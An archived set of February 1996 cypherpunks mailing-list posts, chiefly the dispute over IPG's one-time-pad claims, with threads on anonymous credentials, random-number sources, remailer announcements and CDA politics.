Okay, enough badgering of each other - we deliberately did so yesterday, 
as some of you did, but now is the time for the cypherpunks, and for 
a few of what I will call cyphermouths, to put up or shut up. 
Assuming that you accept, we will supply any designee with the 12 sets, of 
materials, by UPS Next Day Air, and you may distrbute them as desired,  
subject to the above restrictions - we want to fight one problem at a 
time.

I somehow hope that you are able to include my good friend, "joke for 
him I am sure but serious from me", Perry in one of the twelve sites, 
so he can show us how stupid we are. Two of the best computer 
system engineers that I have ever known had the last name Metzger, Bob 
and Charles, who was blind - anyway good luck Perry, you are going to 
need it. We await your reply - assuming you accept, we will deliver the 
materials, one of the first three days of next week.

 
"He who laces himself into the straight jacket of what he knows and 
understands, imprisions his mind" - Willian Friedman memoirs - spoken 
to JVN, and Norbert Weiner, of MIT, at Princeton -
























































































































































































































 
     



    








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Wed, 21 Feb 1996 15:41:57 +0800
To: cypherpunks@toad.com
Subject: Re: Chaotic physical systems as random number sources (fwd)
Message-ID: <199602210157.RAA13227@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  4:24 PM 2/20/96 -0600, Jim Choate wrote:
>I have used magnetic pendulums for this as well as chaotic dripping (both
>with an old C64).

On problem I can think of with pendulums would be a low bit rate.  What
kind or rate do you get from your setup.  (Of course with nano-technology
pendulums ...)


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Wed, 21 Feb 1996 15:54:16 +0800
To: cypherpunks@toad.com
Subject: Re: anonymous age credentials, sharing of
In-Reply-To: <Pine.SUN.3.91.960214143233.28807O-100000@viper.law.miami.edu>
Message-ID: <199602210205.SAA20048@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Michael Froomkin <froomkin@law.miami.edu> writes:

>Suppose Alice is a CA who issues anonymous age credentials.
>Bob is 15
>Carol is 25

>Carol gets a legitimate anonymous age credential from Alice bound to an 
>anonymous public key generated for this purpose.  Carol then gives the 
>key pair to Bob.  Bob uses to do things only adults are legally permitted 
>to do.  (It's not bound to Carol's everday keypair because that's not 
>anonymous....)

>What can stop Bob and Carol from subverting a scheme that relies on 
>anonymous age creditials in this manner?

I think I wrote something about this before, but I can't recall whether
there was subsequent discussion...

In Chaum's pseudonym/credential system, you can be restricted in the
number of pseudonyms you can get of a given type.  You can transfer
your credentials among any of your pseudonyms, but you might only have
one pseudonym (and associated key pair) for a specific forum or
purpose.  So Carol could get her age credential by showing her birth
certificate, and get it on a non-anonymous pseudonym, then transfer it to
any of her other pseudonyms.  Maybe there is a particular nym which she
uses for access in some area, and she has to prove her age in order to do
so.  So she transfers the credential to that pseudonym and can get
access.

Now Carol could give her pseudonym, credential and key pair to Bob, and
let him act as her within that forum (say, for access to a particular
archive).  He could then exercise all of the privileges that she
could.  This is in effect a shortcut for the case where Bob asks Carol,
"get me this file", "get me that file", and she does.  This is in effect
a blanket promise on Carol's part to respond affirmatively to all such
requests.

Obviously, as I think Michael wrote earlier, we can't stop Carol from
doing this on a file-by-file basis.  But we still might want to make it
so she won't give Bob full access, since that will make it even easier
for him to get these files he's not supposed to see, and it seems to
somewhat remove Carol from responsibility for giving each file to Bob.

One thing that might make Carol reluctant to authorize Bob to act as
her agent in this way is that she would also be responsible for any
negative consequences of things Bob does.  If Bob abuses the lent key
pair in some way, such that maybe he is even banned from that archive,
then Carol will suffer the consequences as well.  Given that she only
gets one pseudonym of a kind which can access this archive, she can be
hurt by giving Bob the full use of that nym.

Now, depending on the circumstances, this may or may not be a significant
deterrent for Carol.  If the archive has no material she would be
interested in, or there is no significant likelihood of abuse which would
lead to losing her access, then it won't matter.  But things could be
structured so that these bad consequences were more likely, and then it
would be a more significant consideration for her.

There is a tradeoff between anonymity and accountability here.  We gain
this degree of accountability only be limiting the number of pseudonyms
a person can have for certain kinds of usage, thereby reducing
anonymity.  The most extreme case would would to say that a person can
have only one identity for use everywhere.  That is, we would ban
anonymity.  At the other extreme, anyone can get as many nyms of all
kinds as they want, and transfer credentials in all ways, in which case
credentials are meaningless.  These seem to be the two endpoints
considered in Michael's hypothetical example.

But there are actually a whole range of intermediate points which are
possible.  One example, close to the non-anonymous case, is to give
every person exactly one online pseudonym, unlinkable to their physical
identity, but the only one they can use in their online life.  Now if
they behave abusively the consequences they can suffer are limited.
They can't go to jail.  But still the risks may be relatively severe, and
could include in the most extreme case loss of access to all online
resources, which will be a severe punishment in the future.  Another
point on the continuum would be the use of a single pseudonym for all
access to materials which are illegal for minors to see.  If Carol gives
hers to Bob and he screws it up somehow, she may be stuck watching PG
movies for the rest of her life.

I have tried to think of a better technical fix, such that in order to
give Bob the ability to show one of her credentials, Carol must
inherently give him the ability to use all of them, to act as her in all
forums.  Maybe some zero-knowledge protocol would be required to show a
credential, one which would only work if you knew some basic secret that
underlies all your pseudonyms, but which doesn't reveal it to anyone.
Then Bob could act as Carol only if he knew her innermost secrets.  But
still it would be necessary to retain unlinkability among pseudonyms.  I
can't see how to make it work, and maybe it is fundamentally impossible.
But if something like this were possible it would be a good solution to
the problem Michael has described.

Hal Finney

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQBVAwUBMSp9xxnMLJtOy9MBAQH9GAH9F7E6mZ/4lfL/b/4kdGTSpLZfmvJZu7iK
EN8+wUHrAdi/cobG9KUsrFxcm3evG6ijLyu4WhxQzdoU0k1wyAUN7g==
=X7tH
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: IPG Sales <ipgsales@cyberstation.net>
Date: Wed, 21 Feb 1996 13:45:34 +0800
To: Lucky Green <shamrock@netcom.com>
Subject: Re: Internet Privacy Guaranteed ad (POTP Jr.)
In-Reply-To: <v02120d1aad50107a5006@[192.0.2.1]>
Message-ID: <Pine.BSD/.3.91.960220181451.16533A-100000@citrine.cyberstation.net>
MIME-Version: 1.0
Content-Type: text/plain




On Tue, 20 Feb 1996, Lucky Green wrote:

> At 17:22 2/20/96, IPG Sales wrote:
> 
> >If you are able to break the system, and everyone knows what we mean by
> >break, then we will publicly admit that we are snake oil salesmen, and
> >all the other things that Perry Metzger and others called us.
> 
> It is by no means clear to me what "breaking the system" means. One does
> not have to be able to decipher a single message to prove a system to be
> insecure. Moreover, cryptanalysis is economics: is it more expensive to get
> the information by analyzing the crypto than it is to get it by other
> means?
> 
> Do we have to show an exploitable flaw? Or we have to do the exploit? That
> might be expensive. Who would judge the contest?
> 
> The alogrithm aside, IPG provides the intial OTP. Seems to me that IPG can
> read the messages. End of story.
> 
> 
> -- Lucky Green <mailto:shamrock@netcom.com>
>    PGP encrypted mail preferred.
> 
> 
> 


Lucky - you know the answer to that, several people have access to Cray's 
and the like - you must prove that we have an exploitable flaw, not 
just claim it - everyone claims it smokes and mirrors, why are you not willing 
to  go ahead and decipher a message - everyone claimed it was so easy - 
why are the cypherpunks so quite all of a sudden, we have been getting 
about 5 messages an hour up until we accepted Dereks challenge - now we 
have not received any messages for over five hours until we received 
yours. If it is so EASY, JUST GO AHEAD AND DO IT! 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@UNiX.asb.com>
Date: Wed, 21 Feb 1996 13:21:51 +0800
To: cypherpunks@toad.com
Subject: NOT CRYPTO (Sort of): Fwd: OPPOSITION: AFA seeks to expand CDA
Message-ID: <199602202339.SAA05031@UNiX.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


Got this in the mail. Pardon me if it turns out to be spam, but it's 
relevant.  Pardons to unnamed folx who prefer only crypto stuff.

------- Forwarded Message Follows -------
telstar@wired.com (--Todd Lappin-->) wrote:

While I warms my heart to know that the American Family Association thinks
the Communications Decency act is a dud, the following message demonstrates
that the organization does not intend to let the issue rest.

Specifically, they're now seeking to expand the scope of Internet Service
Provider (ISP) liability for "indecent" content. That makes about as much
sense as asking AT&T to censor your telephone conversations, but
regardless... the bottom line is that the American Family Association is
*very* determined to impose its social agenda on cyberspace through
government legislation.

Moreover, at this point it's hardly clear to what extent ISP's are or are
not liable for online content under the CURRENT provisions of the
Communcations Decency Act.  Given this ambiguity, a more stringent
clamp-down would only expand the "chilling effect" on free speech.

Spread the word!

--Todd Lappin-->
Section Editor
WIRED Magazine

=========================================

COMPUTER PORNOGRAPHY LAW NOT WORKING, SAYS AFA

WASHINGTON, Feb. 14 /PRNewswire/ -- American Family Association issued the
following: "Less than one week after the Communications Decency Act was
signed into law by President Clinton, it is obvious that the law, designed
to curb computer pornography, is not working and never will work," said
Patrick Trueman, director of American Family Association governmental
affairs.  This fact was made clear by the action this week of CompuServe, a
major access provider to the Internet, to restore access to pornographic
Internet sites it had recently blocked under pressure from German
prosecutors.

Access providers to the Internet have a financial incentive to provide
access to pornography and they will not block such sites until they are
under a legalobligation to do so, Trueman said.  The Communications Decency
Act included specific provisions protecting access providers from criminal
liability and until those provisions are repealed, CDA will be nearly
useless, he added.

Trueman wrote to leaders of pro-family groups today urging them to unite
behind a tough anti-pornography measure like that sponsored by Congressman
Henry Hyde.  The Hyde measure, which would have made anyone liable who
knowingly and intentionally provides pornography to children or obscene
pornography to anyone, was defeated in committee by supporters of CDA.
"The reality is CDA does not work and it will never work.  For its
enforcement it relies on a massive number of prosecutions by the Justice
Department of individuals who put illegal pornography on the Internet while
the major distributors and money makers from the distribution of
pornography -- the access providers -- are given a free ride," Trueman said
in his letter to pro-family leaders.

Trueman urged pro-family leaders to act now to change the law. "There is no
point in waiting months or years.  CompuServe has made that clear in its
recent actions which demonstrate that the law has little, if any, deterrent
effect," Trueman said in his letter.

CONTACT:  Patrick A. Trueman of the American Family Association: 202-544-0061

###



Rob. 

---
Send a blank message with the subject "send pgp-key" (not in
quotes) to <WlkngOwl@unix.asb.com> for a copy of my PGP key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 21 Feb 1996 13:37:06 +0800
To: cypherpunks@toad.com
Subject: The Future of US Intelligence - CoFR Report
Message-ID: <199602202356.SAA03606@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   The new CoFR report on the future of US intelligence 
   as covered in recent press reports is digitized. Is
   there a public-spirited site for making it available
   by http or ftp or both? It's 103 kb long, in ASCII.

   Altavista did not show this tealeaf -- to us anyhow.
                 
   _________________________________________________________

                 Making Intelligence Smarter

               The Future of U.S. Intelligence

             Report of an Independent Task Force

        Sponsored by the Council on Foreign Relations
   _________________________________________________________

                             Contents

      Executive Summary
      Introduction
      Background
      The Setting
      The Need for Intelligence
      Collection Priorities
      Setting Requirements
      Improving Analysis
      Economic Intelligence
      Clandestine Activities
      Organization
      Military Issues
      Intelligence and Law Enforcement
      Congressional and Public Oversight
      Additional Views
      Appendix
      Members of the Task Force
      Acknowledgements
      Publication information

   _________________________________________________________






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@alpha.c2.org (Anonymous)
Date: Wed, 21 Feb 1996 16:11:50 +0800
To: cypherpunks@toad.com
Subject: Re: Public Access Obsolete.  Capitalism offers free email
In-Reply-To: <2.2.32.19960220201325.0070e5c8@panix.com>
Message-ID: <199602210305.TAA12394@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


frissell@panix.com (Duncan Frissell) wrote:
>that two companies are preparing to offer free email to customers who agree
>to be barraged by ads.  Juno and Freemark will soon offer free email to all
>(Americans).
>
>http://www.freemark.com/freemark.html
>
>http://www.juno.com/
>
>And since you can do (almost) anything with email that you can do with the
>rest of the net (just more slowly and less conviniently) I guess we don't
>have to worry about government-provided public access any more.


It might be a cheap safe way to set up a remailer too...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Murray <ericm@lne.com>
Date: Wed, 21 Feb 1996 16:27:09 +0800
To: cypherpunks@toad.com
Subject: Re: NSA net trolling
In-Reply-To: <199602210313.WAA12167@thor.cs.umass.edu>
Message-ID: <199602210322.TAA25746@slack.lne.com>
MIME-Version: 1.0
Content-Type: text/plain




Here's a copy of your message back to you as you requested:

lmccarth@cs.umass.edu writes:
> 
> Wayne Madsen wrote somewhere:
> > A knowledgeable government source claims that
> > the NSA has concluded agreements with [...] Netscape to
> > permit the introduction of the means to prevent the anonymity of
> > Internet electronic mail, [...]
> 
> I suspect this may actually mean that they're pushing Netscape to
> incorporate cryptographic authentication into browser email, which I think is
> a useful development. (Hey, I read that Netscape employees get fined $1 for 
> referring to Navigator as a "browser".)
> 
> At any rate, it's an excuse for me to ask some questions:
> 
> (0)
> I'm not aware of any class library objects or methods in stand-alone Java
> for calling the local mail transport agent. Is there any class library 
> support in Java+{Navigator, HotJava, Mosaic, NetCruiser, the AOL web tool, 
> etc.} for calls to the local mail agent configured in the browser ?  
> 
> I would prefer not to reinvent SMTP using the Socket class in my own applets.
> Ideally I'd like to have an applet that presents a form with some entry boxes
> and check boxes, quantizes and encrypts the input according to the check box
> settings, and spews the resulting byte streams to the MTA. 
> 
> (1)
> As I recall, I used to be able to set (as an Option) the path and name of the
> local MTA (e.g. /usr/lib/sendmail) in an earlier version of Netscape. That
> seems to have disappeared in Navigator 2.0. Is there indeed no longer a way
> to set that ?  
> 
> It occurs to me that we could have achieved partial integration of
> remailing into Navigator quite cheaply with that option.
> 
> Comments from Sun and/or Netscape and/or anyone else would be welcome.
> Thanks :)
> 
> -Lewis	"You're always disappointed, nothing seems to keep you high -- drive 
> 	your bargains, push your papers, win your medals, fuck your strangers;
> 	don't it leave you on the empty side ?"  (Joni Mitchell, 1972)
> 
> 


-- 
Eric Murray  ericm@lne.com  ericm@motorcycle.com  http://www.lne.com/ericm
PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03  92 E8 AC E6 7E 27 29 AF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jason Rowley <j@iag.net>
Date: Wed, 21 Feb 1996 14:27:54 +0800
To: Ed Carp <erc@dal1820.computek.net>
Subject: Re: JavaScript to grab email
In-Reply-To: <Pine.3.89.9602201426.A32004-0100000@dal1820.computek.net>
Message-ID: <Pine.SV4.3.91.960220194836.28039A-100000@seminole.iag.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 20 Feb 1996, Ed Carp wrote:

> On Tue, 20 Feb 1996, Mike Rose wrote:
> 
> > Sorry for the imprecision here.  I was referring to Netscape 2.0 on
> > unix here.  Changing the email address known to netscape is
> > insufficient for non-root users on unix systems, because sendmail will
> > put your real address into the headers.
> 
> How about setting the mail proxy to something bogus? ;)

Like "127.0.0.1:7"? :)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Alan B. Clegg" <abc@gateway.com>
Date: Wed, 21 Feb 1996 14:19:03 +0800
To: cypherpunks@toad.com
Subject: New remailer (vegas) now operational.
Message-ID: <Pine.BSI.3.91.960220172537.4144n-100000@mypc.gateway.com>
MIME-Version: 1.0
Content-Type: text/plain


Greetings, all.

remailer@vegas.gateway.com is now on-line.  It is a type 1 cpunk remailer
running standard ghio code. 

The following is vegas's PGP key:

--SNIP--
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAzD9XEQAAAEEALrf7ZZV9ECB6jT0C7uVXByVa5332+yl1QIbx72FI+xWoyWF
5+MQkm803NaLyBabTrDyqJ6xkMLDu8acbH8OaATrAfUBM2qTZIVzlsgpynLkvCRv
OOJfV6fHkaNzbHnYKF3JuLPiyPpXTgJDESIEyqEh9bm34YT711XZZ6mRHzrtAAUR
tCtWZWdhcyBSZW1haWxlciA8cmVtYWlsZXJAdmVnYXMuZ2F0ZXdheS5jb20+iQB1
AwUQMP1xfZBA6uEVwDr9AQGibwL/adSqV5/12G+cH5cd5VDupuN570qS7dZdr6BI
W9msl+TV7Y9KQUVcKqJ2AAZ6Ng0164WD4JgmYqeDqni0oYyk+Rm9IBmddJ/b0g9Z
7XbWH9w7/J8Zbbdx3mi4IpmwPAZe
=9SYZ
-----END PGP PUBLIC KEY BLOCK-----
--SNIP--
 
which can be verified against ftp://ftp.gateway.com/pgpkeys/remailer.pgp

Enjoy, & watch for the anouncement of a new nym server soon.....

-abc
                                      \             Alan B. Clegg
         Just because I can            \            Internet Staff
        does not mean I will.           \          gateway.com, inc.
                                         \     <http://www.gateway.com/>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Wed, 21 Feb 1996 16:45:41 +0800
To: IPG Sales <ipgsales@cyberstation.net>
Subject: Re: Internet Privacy Guaranteed ad (POTP Jr.)
Message-ID: <v02120d1bad5045a18a51@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 18:46 2/20/96, IPG Sales wrote:

>Hedging, hedging, hedging - why? I did not noitice this in my first
>reply - in addition to giving you the company if you can break the
>system, we will give you the company if you can establish, through our
>employees or any other method, that we retain any Ocopies of the TPs,
>any! - for very large systems, we maintain a temporary copy to insure
>safe arrival, by excuting the check system menu item -
>it is immediate destroyed upon system notification. Anyone that wants to
>audit us cazn do so, unannounced at any time - subject to payment ofd
>expenses! We do not keep copies, we would not be in business 30 days if
>we did.

It is irrelevant if you keep copies of the OTPs or not. The point is that
you might. There is no way to prove to me or anyone else that you don't
keep copies. [why this is true is left as an exercise to the reader].

I would not trust anyone outside my company to create keys for us. I would
urge any others interested in keeping their data inaccessible to outsiders
to exercise the same fundamental caution. There is no further need to look
at IPG's source code or algorithms.

As I said, end of story.


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Murphy <packrat@ratbox.rattus.uwa.edu.au>
Date: Tue, 20 Feb 1996 21:20:11 +0800
To: "'Cypherpunks Mailing List'" <cypherpunks@toad.com>
Subject: Re: Windows 95 encryption shell extension
In-Reply-To: <01BAFEAE.63BB64E0@loki>
Message-ID: <199602201245.UAA00304@ratbox.rattus.uwa.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


In message <01BAFEAE.63BB64E0@loki>, 
  Brian Gorka wrote:
> On Monday, February 19, 1996 4:32 AM, Andy Brown[SMTP:a.brown@nexor.co.uk] 
> wrote:
> >http://www.fim.uni-linz.ac.at/win32/codedrag/codedrag.htm
> >
> >Haven't tried it myself since I don't use Windows 95, just thought
> >I'd report what I saw.
> >
> 
> I downloaded this, AND installed it.  It displays your password right on 
> the screen!!!  No *s, no blind typing.  Anyone looking over ytour shoulder 
> can see what you type as your passphrase!  Come on.
> 

Aha! but what you didn't know was that it was FV's card number
sniffer, and their obviously competent programmer needed another four
weeks to get the '*'s to come up...

One has to wonder about the security of binaries random people put up
especially for closed systems such as Win96 don't you?

--
Packrat (BSc/BE;COSO;Wombat Admin)
Nihil illegitemi carborvndvm.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Sean A. Walberg" <umwalber@cc.UManitoba.CA>
Date: Wed, 21 Feb 1996 16:06:20 +0800
To: cypherpunks@toad.com
Subject: Re: JavaScript to grab email
Message-ID: <199602210305.VAA05612@electra.cc.umanitoba.ca>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

If you don't have a mail server set up, it won't send  (PC version at 
least).  Fine by me, cuz I just copy the address into Pegasus to send 
mail.  YMMV.

Sean


> Another annoying feature in JavaScript and Netscape. Have a look at 
> <http://www.popco.com/grabtest.html>
> 
> The page uses JavaScript to steal your e-mail address and sends a test 
> e-mail message to the address it grabbed. It works with Netscape, which 
> is probably only browser supporting JavaScript.

 

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMSqKGd82JgvRKzQZAQGyTwQAiKo1XUGZHPCgrwJU2ZWM/aREb/LHAebi
kGDWNyC4qFrDkB//A2jN6ZWckdEuuCvX+OKLyYZHWTZ/sTjvi7WDsTprrXt96mZV
ho1TB3nzemzRVZVO9aWUW/Zhpa+fi0MoSAlZC5ZFsdvnrEZUJSEbd5S1aubPA/gc
2/Zf6v1rbNw=
=W/Fp
-----END PGP SIGNATURE-----
       =================] Will work for RAM [==================
       |     Sean A. Walberg       | PGP key |  C programmers |
       |  Computer Engineering ][  |   on    |    do it in    |
       | umwalber@cc.umanitoba.ca  | servers |   libraries!   |
       =============] http://www.escape.ca/~sean [=============




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Wed, 21 Feb 1996 11:34:37 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199602202023.VAA26697@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


::
Subject: Re: List of reliable remailers

On Mon, 19 Feb 1996 06:50:11 -0800, Raph Levien <raph@CS.Berkeley.EDU> 
wrote:

>   I operate a remailer pinging service which collects detailed
>information about remailer features and reliability.

[snip]

What does it mean if a certain remailer is *not* shown on the current 
list?  Is it down?  Or simply not tested?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 21 Feb 1996 16:09:34 +0800
To: IPG Sales <ipgsales@cyberstation.net>
Subject: Re: Internet Privacy Guaranteed ad (POTP Jr.)
In-Reply-To: <Pine.BSD/.3.91.960220140515.9829M-100000@citrine.cyberstation.net>
Message-ID: <199602210229.VAA07560@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Dear IPG Sales (May I call you "I", or would that be too familiar?)

1) There is no such organization as "Cypherpunks". "Cypherpunks" is a
   mailing list, not an organization. Using the name of the mailing
   list as though it were an organization is anti-social. There is no
   one who has the authority to speak for "Cypherpunks" because there
   is no such beast.
2) I see no reason to "trade" with you folks whatsoever. Any honest
   company would simply publish the technical specifications of their
   work and allow independent evaluation of the quality of your
   algorithms. I don't know about other people, but from my point of
   view, no deals (Other people are free, of course, to come to an
   arrangement with you). Submit your algorithms for peer review
   honestly or find yourself ridiculed anyway. I will not even look at
   a non-public specification. 
3) I warn you -- if you sell a system that you know to be potentially
   defective, and fail to take measures to evaluate its security using
   common industry standards (i.e. open peer review) you can and will
   be liable to any number of legal actions, all of which you will
   richly deserve, and no number of silly disclaimers on your
   packaging will save you. I'll happily give expert testimony for the
   plaintiffs and or prosecution, depending on whether it goes criminal.

> "He who laces himself into the straight jacket of what he knows and 
> understands, imprisions his mind" - Willian Friedman memoirs - spoken 
> to JVN, and Norbert Weiner, of MIT, at Princeton -

They laughed at Fulton, but they also laughed at Bozo the clown. All
indications are that you are in the latter, not the former set.


Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jf_avon@citenet.net (Jean-Francois Avon (JFA Technologies, QC, Canada))
Date: Wed, 21 Feb 1996 15:59:42 +0800
To: cypherpunks@toad.com
Subject: Secure Split
Message-ID: <9602210251.AA16675@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


Hi! this is the second time I post this to CP.

Where can I get Secure Split?
Apparently, it is a program to split a key in m parts, where 
n (<m) parts could rebuild the key.

I saw that name in Nautilus manual (a pgpphone lookalike for dos).

I looked through Alta Vista and the only thing I found was a post on CP
by somebody else looking for it, in 1994 (?)
Does such a program exists?
If yes, where can I get it?

Regards

JFA
**** NEW PGP 2.6.2 KEY *********
This key is actually suspended, as of Feb, 16 1996, was never distributed,
and might be subject to deletion.  Sorry for the trouble my mis-management might have caused.

2048 bits Key ID:24201BA1 1996/02/13 Jean-Francois Avon <jf_avon@citenet.net>
Key fingerprint =  23 B6 24 31 86 67 FB 35  C7 A7 AF 12 A1 61 E9 3D 


**** OLD KEY: DO NOT USE ANYMORE UNLESS FOR VERIFYING SIGNATURES ****

1024 bits Key ID:57214AED 1995/10/04 Jean-Francois Avon <jf_avon@citenet.net>
Key fingerprint =  84 96 76 AE EB 7C AB 15  88 47 87 B0 18 31 74 9F 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tbyfield@panix.com (t byfield)
Date: Wed, 21 Feb 1996 16:16:45 +0800
To: ipgsales@cyberstation.net
Subject: Re: Internet Privacy Guaranteed ad (POTP Jr.)
Message-ID: <v02120d05ad5033345066@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


At 6:46 PM 2/20/96, IPG Sales wrote:

>Hedging, hedging, hedging - why? I did not noitice this <...>

        IPG, why don't you sit down and draw up the terms of a challenge?
Specify:

        * what information and/or materials IPG will release
        * to whom it will release them and when
        * who is or isn't elligible
        * what you will and won't accept as "breaking your system"
        * the arbitrating body
        * a starting time and a deadline
        * the award

        You'd do well to be _very_ thorough in these terms, since any
perception that IPG was trying to throw the game would draw that much more
fire. You'd also do well to make terms terms conform to real-world
circumstances: for example, if someone hacking the office machines on which
which you generate, store, and/or disseminate RNs is a practical threat to
your product, then admit that as an acceptable part of a "break."

Ted






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@atlas.ex.ac.uk
Date: Wed, 21 Feb 1996 12:53:13 +0800
To: geeman@best.com
Subject: Guaranteed snake-oil, er, privacy...
Message-ID: <13501.9602202156@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



geeman@best.com writes:
>	The 
>        posting(s) concern an extremely easy to use, unbreakable system 
>        for encrypting all user sensitive data going out over Internet.
>        As a reference to its unbreakability, I refer you to an 
>        article by Paul Leyland on Internet at:
>
>               http://dcs.ex.ac.uk/~aba/otp.html
>
>        Mr. Leyland refers to some problems, which our PCX 
>        system addresses and resolves.

Some corrections: I (Adam Back) wrote the www page you refer to, the
attribution to Paul Leyland <pcl@oucs.ox.ac.uk> on that page is
refering to his implementation of a OTP in 1 line of C which I
included with permission:

main(i,c)int*c;{for(c=fopen(c[1],"r");i=~getchar();putchar(getc(c)^~i));}

>        Mr. Leyland refers to some problems, which our PCX 
>        system addresses and resolves.

Neglecting the misattribution, some comments on IPG's claims are in
order.  My page mentions that OTPs are provably secure:

: "OTPs are provably unconditionally secure"

BUT, I also go to great pains to make clear that the security of OTPs
rests critically on the true randomness of the PAD:

: <H3>Generating OTPs</H3>
: 
: It can't be stressed enough how important it is to have a truly random
: OTP.  Just using the <TT>random()</TT> function provided with C
: libraries is nowhere near good enough, these typically have a seed of
: one 32 bit word, so that even if you used the millisecond of your
: clock as a seed the whole system could be broken with a brute force
: keysearch of all possible seeds.  In cryptographic terms a 32 bit
: keyspace is tiny, and would take a negligble amount of compute time to
: break.
: 
: <P>
: 
: Basically if you use pseudo-random number generators they are going to
: be the weak point in the system, unless you have external input like a
: radio-active decay card, or timings of the milliseconds between
: keystrokes with proper entropy estimation as used by PGP.

I'm sure everyone reading understands ad nauseum about OTPs etc, but I
would like to take the opportunity to distance myself from any claims
being made by IPG, and to state categorically as the author of the www
page quoted that I do not agree with IPG interpretation of what one
can legitimately call a secure OTP system.

I think (and this has been pointed out repeatedly to POTP in the past)
that you would go a lot further if you made realistic claims, and used
standard nomenclature.

If you have a new stream cipher using a PRNG, say so, publish the
algorithm for peer review, and go from there.  It is the calling it
something which it is not which generates criticism out of hand.
People look no further.  I'd suggest replacing marketing at IPG with
some one who can at least sound convincing.  As lots of people have
said: publish the algorithm.

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@2005.bart.nl (Senator Exon)
Date: Wed, 21 Feb 1996 10:15:04 +0800
To: cypherpunks@toad.com
Subject: ANNOUNCE> New remailer
Message-ID: <199602202102.WAA01406@ddh.bart.nl>
MIME-Version: 1.0
Content-Type: text/plain


The Exon Remailer (remailer@remailer.nl.com) is up. It supports Type 1
(Ghio) messages and news postings. It is still in beta testing.
Comments to remailer-owner@remailer.nl.com would be appreciated.

	Grtz, 

	Senator Exon

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2i

mQCNAzEqIb0AAAEEANNdNiByrACsMnADFF4XVIaVGteITHQJ7jgYT8xis1VFXdRq
II+vpHKJv0kIuf8l1B4xMk3t/AGH2zk6BwBFXwMZutSDfhxSZ/8VHky9yZQ3Zzfy
0cLCa2rfMS456WhJpj+m1X53IHMqjghm5zosF+gKJN95+/jzSWQjxfIE5MYJAAUR
tCdTZW5hdG9yIEV4b24gPHJlbWFpbGVyQHJlbWFpbGVyLm5sLmNvbT6JAJUDBRAx
KiVIWd90FI1WkT0BAQxwA/9aPuL33L7jt7yI/nFJ/xkRsPOWFrRq0sHXemEfXe4D
3mhxeA3HKjZYlKtDN2DTXVK0IEb0lkTefV3HfbMRyHyeJ+9nf+gn6ASNifXUKWnl
JZwcWBIFA25TeQX9MqdO4WZfIV6LFPJPmNJ5yeB5X4JGNU/KihBSS9KNocduMp49
cYkAlQMFEDEqH1Qp1cio8BPPmQEBm3QEAJlWcOX0nPDg/qU2WRMs1CyVNtNBQDsH
zmvadUfULzLuiKIwfSEnyoX0m9RIgdOdpQCPHHlFqMQDijtab5+aeF3Vaa/n4uGw
lpGjvg9Zz6zNNBikywpv9spd+95HZEMvPisTaPOnVGHJRG45qgm8GTnOMZEe6qgk
voxTA4UafmY1iQCVAwUQMSoid2QjxfIE5MYJAQHDngQAtajcXiFJaS2TEwuldzHE
DP7W2UlwQnSu8RYvnO2bnLZCaAnjl5gjcY+72L6+84WAhwM5upmCsCt3XxsDJz7O
KY88Tqo/oMLItwl91npjepwktJ5SoiNuW8oXeVI1lDKaSvImYmDP7D2I7YJ+iCHE
